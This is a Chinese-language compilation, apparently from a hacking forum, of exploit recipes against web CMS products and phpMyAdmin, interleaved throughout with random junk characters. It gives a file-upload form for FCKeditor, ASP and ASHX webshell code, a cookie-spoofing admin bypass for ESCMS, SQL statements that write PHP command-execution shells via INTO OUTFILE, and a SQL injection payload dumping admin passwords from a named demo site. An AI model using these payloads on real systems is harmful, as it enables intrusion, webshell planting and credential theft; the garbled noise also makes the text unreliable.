2 r0 T2 N/ O( ^. h* l0 k跳转到网站根目录上传任意文件。0 R! @* j! @1 ]4 {4 g
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
! u: t) i8 l! i' O5 X4 C( e) i<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">7 i% _: A) ~) N
Upload a new file:<br>
2 l4 Q0 F" {7 u- {" Z<input type="file" name="NewFile" size="50"><br>
/ K$ C9 C0 N/ U9 g, X<input id="btnUpload" type="submit" value="Upload">
% Q5 M6 e( o1 m* l' v8 q% O- @% q6 m: r, T</form>. O& ]; V; U( {: W$ V
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------6 @ D* U5 r- d' }5 E7 S+ |7 l
! y2 p1 e: S, V7 h2 b1 r2 D4 ` O
SDcms 后台拿webshell4 o+ A, k1 }- k+ q2 [8 ]% |
+ P) S; l4 S$ n* I, r第一种方法:3 K E: T+ A% F: ^9 r5 j1 z
进入后台-->系统管理-->系统设置-->系统设置->网站名称;, d* d+ y4 ]; {0 Q- _
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
5 y$ q) r! |4 P# }) q7 L1 ~3 W用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
" e( J; i+ ]( Q5 i b C/ _第二种方法:
* X$ t' ^% Q3 g- W/ h* q进入后台-->系统管理-->系统设置-->系统设置->上传设置;
% U T: ^) N! S. }在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!. N2 {1 f* D& _- _0 H) V- s$ S
第三种方法:
7 \6 v9 G) v/ B9 s# h1 p1 m5 l进入后台-->界面管理-->模板文件管理-->创建文件0 d! z5 \. T7 w* A T
文件名写入getshell.ashx
" T9 a# h$ U J3 B4 J5 D/ ?内容写入下面内容:
$ Y- ]) K. x+ ^& k- Q+ ?" [% \7 s/====================复制下面的=========================/* F& U& W i0 W$ }
<%@ WebHandler Language="C#" Class="Handler" %>- I9 U6 F0 [& l8 Q' b6 U" ]
using System;5 P4 r5 k4 u8 H5 ]
using System.Web;3 F2 E* C- ]6 T- y# b# z% i
using System.IO;3 C% ~& {( l/ d2 l1 s9 V' y
public class Handler : IHttpHandler {
4 B2 ?+ U4 l8 T2 [4 |public void ProcessRequest (HttpContext context) {
* D4 @0 `* F/ g% }7 Z/ qcontext.Response.ContentType = "text/plain";, t! o( S* b6 w& D2 n0 H E* ~2 h
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));) _) f& |, ?/ m& @5 b( k |
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");5 L% _" A) J" A, p" B5 z. I9 v3 v: F1 z
file1.Flush();) ~# } z% p6 }
file1.Close();% b4 B% W& o0 s& @$ S; t- o
}
' k( @2 {+ u+ g0 J9 D4 X- wpublic bool IsReusable {* G) |* g( C* \7 N
get {+ E4 w, |$ H x/ U9 W2 j
return false;
5 y5 v% z( k1 h' ^- b6 V}
5 ], z" p1 g* |) m6 i6 W}8 C0 u0 R1 F8 Y! h$ z( g
}, K- q4 _( }3 a0 n$ Q
/=============================================/' J' K; [$ H' {" ~
访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx9 X- R* n$ {: Q2 b, J9 h+ u5 Y; F
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接/ ^+ g8 n! g7 i0 f; V
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------, J1 w+ G# ^2 U3 M/ C8 @
2 q- u4 v2 [$ Y: B0 \( o/ q- v& dESCMS网站管理系统0day
. x- N. D# i$ U- C: t! r$ A: y6 @! @; l+ \9 C* c3 t, c
后台登陆验证是通过admin/check.asp实现的
o% }' w+ o) Y5 h) ~2 w; T
4 l' B' y* G' B1 N2 J z首先我们打开http://target.com/admin/es_index.html9 K/ w/ J+ q* Y. ?( W* X* _
然后在COOKIE结尾加上
; i. B. f L A1 j5 D/ l; ESCMS$_SP2=ES_admin=st0p;
; F* |, W. f& F修改,然后刷新
* o1 L J }8 @+ X* h, V' ?' F9 I进后台了嘎..! ?. W, v1 X7 f# i) i# E7 {1 ^
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
8 V2 {/ h! p }/ q
+ X) M- Q: V: p9 v4 w利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
) ` n, y3 c d9 e" @嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp) M( I# s" S$ L; F- E/ J* ^2 ]& I+ w
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败... ~& g' n$ p0 ?* Z- \2 A$ E) m! d
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了( g) d$ }1 e' ^
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 M) s* y& r+ q, r4 M! V
/ C6 e+ H- N& V/ j; }宁志网站管理系统后台无验证漏洞及修复3 a& ]& y! Z( p% V% W
- f) e; y+ u( Z$ T
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
. a) L( ~! ` N4 H官方网站:www.ningzhi.net
! j \9 A+ ~7 s! p1 [" K1 I学校网站管理系统 V.2011版本 ! h1 r7 @' K0 i& G
http://down.chinaz.com/soft/29943.htm ) E& U% L' N/ ^
其它版本(如:政府版等),自行下载.* }* B# c7 y3 {% C8 D' k
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
. ?8 i, b. Q; `% l4 y2 b3 Ologin.asp代码如下:) Q* O2 e) V* e* M+ H
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> 9 [, F2 |0 D& p: F6 v: E9 {
manage.asp代码我就不帖出来了.反正也没验证.
2 X/ {1 I4 c. q+ H+ G只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!& w, x3 Y3 _) }$ |# i: D o1 R R
漏洞利用:8 e% Y1 S, ^4 ]. @) P& e$ g, \
直接访问http://www.0855.tv/admin/manage.asp
% i2 }3 H p1 s( b" }* r g2 }& e数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5( ^8 [1 A" u- I
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 T7 _( H$ P/ x5 y5 [& N
) ~( _3 ]2 p6 ~2 x% \2 bphpmyadmin拿shell的四种方法总结及修复
. q) K+ D, _ ?9 J) G
& {( N! ~( x$ [方法一:0 \* k# s; ?2 T7 V+ z7 i$ i
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
( ?/ W) z# W4 N2 Z: gINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');' L. X f z& }& T. d9 C- [
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';# i4 _' ~( m$ G4 l
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
$ n, G! w8 [ H3 `' W! f 一句话连接密码:7on* q. R1 a6 _' C$ \5 c
方法二:
( I3 C8 C( E- q0 D% t/ T8 T$ u, w读取文件内容: select load_file('E:/xamp/www/s.php');
* J' F, G n* k7 [/ B# w) k) X写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'. J2 y7 q, y F3 `7 x: C$ y; [
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'9 G. [) q9 ?1 t9 L [+ Y) _7 D
方法三:( H' E! \+ T0 B4 A/ Z3 D& \
JhackJ版本 PHPmyadmin拿shell
: C! [% t9 T! _% CCreate TABLE study (cmd text NOT NULL);, i+ C5 N1 g; g; r; g5 f J7 J6 T
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
; @" w, p' P" Z1 W X3 _* |5 G+ fselect cmd from study into outfile 'E:/wamp/www/7.php';5 {5 @& X* @/ [" e y
Drop TABLE IF EXISTS study;
6 w* k/ \8 v8 ]$ v' h<?php eval($_POST[cmd])?>
* P# G& _0 u/ v5 _; k; GCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。" f7 Q% x5 ?- {- @
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
# g7 s8 k5 S% r6 L- TSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
% i1 T1 `9 L9 [6 uDROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
# n4 }( K. o) @# ^/ J! }% u0 r方法四:& i2 Q; g& B" L# v# T+ v7 v
select load_file('E:/xamp/www/study.php');
4 S/ I7 X5 K" B. B& L; Xselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'# Z# C2 ^+ M1 F) v) p
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir' T! S! I: b& @( F! A# F
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 z' Z' L% ] f! [' R; w& u7 C g' G, I9 G/ d) Z4 n4 }* [
NO.001中学网站管理系统 Build 110628 注入漏洞
2 z% J+ y1 ~# E' a N# Q# v3 m$ c) G7 N. _6 D2 G. U3 _
NO.001中学网站管理系统功能模块:8 G+ K# h* u _" T9 f
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
& }* I: q; F4 | z" p1 ^. I$ e2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息% q6 i* v) o9 F. j
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
( k) C/ V' H/ t' ]: B4.视频图片管理:一级分类,动态添加视频或者图片等信息
% ~: Q# X/ c/ a4 ~( O0 K5.留言管理:对留言,修改,删除、回复等管理8 O1 c4 I3 U0 Z# J
6.校友频道:包括校友资料excel导出、管理等功能
( }9 g( T0 m& S' x" B# q0 P$ v7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页7 N' q3 ]; n! s9 {# |2 ^
默认后台:admin/login.asp
7 y' Q- K3 _. u* [# @) D官方演示:http://demo.001cms.net
' G+ @* G+ D$ v8 L! y6 L9 q- u' d源码下载地址:http://down.chinaz.com/soft/30187.htm7 F6 ~# y) Z ]; S/ }" W
EXP:
8 J5 r3 w" t2 L& ounion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin# S/ w1 {) V4 ]
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
. P& v( A1 T% j. R4 b5 Hgetshell:后台有备份,你懂的9 y. U( G% Z3 }
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。; ?. `2 `. Z' D& M; e: Z
------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |